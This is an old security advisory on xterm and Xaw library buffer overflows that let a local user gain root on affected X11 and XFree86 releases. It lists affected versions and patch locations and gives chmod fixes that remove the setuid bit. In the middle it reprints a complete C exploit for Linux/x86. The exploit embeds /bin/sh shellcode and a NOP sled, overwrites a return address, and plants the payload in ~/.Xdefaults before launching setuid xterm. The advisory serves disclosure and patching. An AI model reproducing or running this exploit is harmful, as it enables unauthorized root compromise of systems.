COMMAND
xterm and Xaw
SYSTEMS AFFECTED
Systems running xterm/Xaw (see below for details)
PROBLEM
Following info is based on Open Group Advisory. Vulnerabilities
exist in the terminal emulator xterm(1), and the Xaw library
distributed in various MIT X Consortium; X Consortium, Inc.; and
The Open Group X Project Team releases. These vulnerabilities may
be exploited by an intruder to gain root access. The resources
and the releases affected by the xterm vulnerability are:
inputMethod preeditType *Keymap
Release
X11R3 NO NO YES
X11R4 NO NO YES
X11R5 NO NO YES
X11R6 NO NO YES
X11R6.1 YES YES YES
X11R6.2 YES YES YES
X11R6.3 YES YES YES
X11R6.4 YES YES YES
The resources and the releases affected by the Xaw library
vulnerability are:
inputMethod preeditType
Release
X11R6 YES YES
X11R6.1 YES YES
X11R6.2 YES YES
X11R6.3 YES YES
X11R6.4 YES YES
Note: X11R6.2 was not released to the public.
By crafting an arbitrarily long string that contains embedded
machine code and using it to set specific "resources", a user may
obtain a shell prompt that has root privileges. Anyone using the
MIT X Consortium; X Consortium, Inc.; or X Project Team xterm and
that has xterm installed setuid-root may be vulnerable. Anyone
using an xterm based on any of the sources listed above may also
be vulnerable to the xterm vulnerability. In order to be
vulnerable to the Xaw library vulnerability, the Xaw Text widget
must be used by a setuid-root program. Anyone using an Xaw
replacement based on any of the released versions of Xaw listed
above (e.g. Xaw3d) may also be vulnerable to the Xaw
vulnerability. Same goes for XFree (which is not a member of
TOD). 'alcuin' made linux exploit (taken from rootshell). See
XFree advisory for patches see 'Solution' section.
/*
xterm_exp.c : linux/x86 xterm.Xaw exploit
by alcuin
5/4/98
It works against both Xaw and neXtaw widgets
NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
use xterm again.
*/
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
unsigned int getsp() {
asm("mov %esp,%eax");
}
inline rootshell(){
__asm__(
"movb $0x56, %al\n\t"
"l1:cmpb $0x12, %al\n\t"
"je l2\n\t"
"movb $0x12,%al\n\t"
"call l1\n\t"
"l2:pop %esi\n\t"
"xorl %eax,%eax\n\t"
"movb $0x25, %al\n\t"
"addl %eax,%esi\n\t"
"movl %esi,%ebx\n\t"
"movl %esi,%edi\n\t"
"movb $8,%al\n\t"
"addl %eax,%edi\n\t"
"movb $5,%al\n\t"
"addl %eax,%esi\n\t"
"movl %esi,(%edi)\n\t"
"movl %edi,%ecx\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"xorb %al,%al\n\t"
"movl %eax,(%edi)\n\t"
"movl %edi,%edx\n\t"
"movb $0xb,%al\n\t"
"int $0x80\n\t"
".string \"/bin/sh\"\n"
);
}
#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"
main (int argc, char **argv) {
char *home;
FILE *f_in, *f_out;
char buf[16384];
char shellbuf[16384];
char *s;
int i;
unsigned int sp=getsp();
if (home = getenv("HOME")) chdir(home);
if (!(f_out = fopen(NEWFILE, "w"))) {
perror("fopen");
exit(1);
}
if (f_in = fopen(CONFFILE, "r")) {
fseek(f_in,0,SEEK_SET);
while (!feof(f_in)) {
fgets(buf,16384,f_in);
for (s=buf;isblank(*s);s++);
if (strncmp(s,"xterm*imputMethod",17)<0)
fputs(buf,f_out);
}
fclose(f_in);
}
/* fill the buffer with nops */
memset(shellbuf, 0x90, sizeof(shellbuf));
shellbuf[sizeof(shellbuf)-1] = 0;
/* write the return adress */
s = shellbuf+2052;
*(int *)s=sp+0x69F5;
/* write the root shell code */
s = shellbuf+2800;
strcpy(s,(char*)rootshell);
fputs("xterm*inputMethod:",f_out);
fputs(shellbuf, f_out);
fclose(f_out);
system("/bin/cp "CONFFILE" "OLDFILE);
system("/bin/mv -f "NEWFILE" "CONFFILE);
execl("/usr/X11R6/bin/xterm","xterm",NULL);
}
SOLUTION
This issue will be corrected in future X Project Team releases of
X11. Temporary solution should be to remove the setuid-root bit
from the xterm binary:
# chmod 0755 <path-to-xterm>/xterm
For the Xaw vulnerability, remove the suid-root bit from any
programs which use the Xaw text widget:
# chmod 0755 <setuid-root-program>
Patches to address this vulnerability have been given to X Project
Team members:
Astec
Attachmate
BARCO Chromatics
CliniComp International
Digital
Hewlett-Packard
Hitachi
Hummingbird Communications
IBM
Jupiter Systems
Metro Link
Network Computing Devices
NetManage
Peritek
Seaweed Systems
Sequent Computer Systems
Shiman Associates
Silicon Graphics
Societe Axel
Siemens Nixdorf
Starnet
SunSoft
WRQ
Xi Graphics
The patches, when they become available, may be found on
ftp://ftp.x.org/pub/R6.4/fixes/
All releases of XFree86 from 3.0 to 3.3.2 (inclusive) are
vulnerable. XFree86 is independently releasing its own fixes for
these problems. A source patch is available at:
ftp://ftp.xfree86.org/pub/XFree86/3.3.2/fixes/3.3.2-patch1
Updated binaries for some OSs are also available now, and others
will be available soon. The updated binaries can be found in the
X3321upd.tgz files in the appropriate subdirectories of the
XFree86 3.3.2 binaries directory:
ftp://ftp.xfree86.org/pub/XFree86/3.3.2/binaries
Be sure to read:
http://www.xfree86.org/3.3.2/RELNOTES.html
A patch is available for the NetBSD 1.3 and NetBSD 1.3.1 X11
source, which fixes the above problems. You may find this patch
on the NetBSD ftp server:
ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19980503-xsrc
Patches for Xaw vulnerability for IRIX:
OS Version Patch # Other Actions
---------- ------- -------------
IRIX 5.0.x Upgrade or disable
IRIX 5.1.x Upgrade or disable
IRIX 5.2 Upgrade or disable
IRIX 5.3 3162
IRIX 6.0.x Upgrade or disable
IRIX 6.1 Upgrade or disable
IRIX 6.2 3163
IRIX 6.3 3164
IRIX 6.4 3165
IRIX 6.5 6.5.1 Note
NOTE: If you have not received an IRIX 6.5.1m CD for IRIX 6.5,
contact your SGI Support Provider or download the IRIX 6.5.1
Maintenance Release Stream from http://support.sgi.com/
Patches for xterm vulnerability for IRIX:
OS Version Patch # Other Actions
---------- ------- -------------
IRIX 3.x Upgrade or disable
IRIX 4.x Upgrade or disable
IRIX 5.0.x Upgrade or disable
IRIX 5.1.x Upgrade or disable
IRIX 5.2 Upgrade or disable
IRIX 5.3 3142
IRIX 6.0.x Upgrade or disable
IRIX 6.1 Upgrade or disable
IRIX 6.2 3143
IRIX 6.3 3144
IRIX 6.4 3151
IRIX 6.5 6.5.1 Note
NOTE: If you have not received an IRIX 6.5.1m CD for IRIX 6.5,
contact your SGI Support Provider or download the IRIX 6.5.1
Maintenance Release Stream from http://support.sgi.com/
The patches contain details on how to apply it.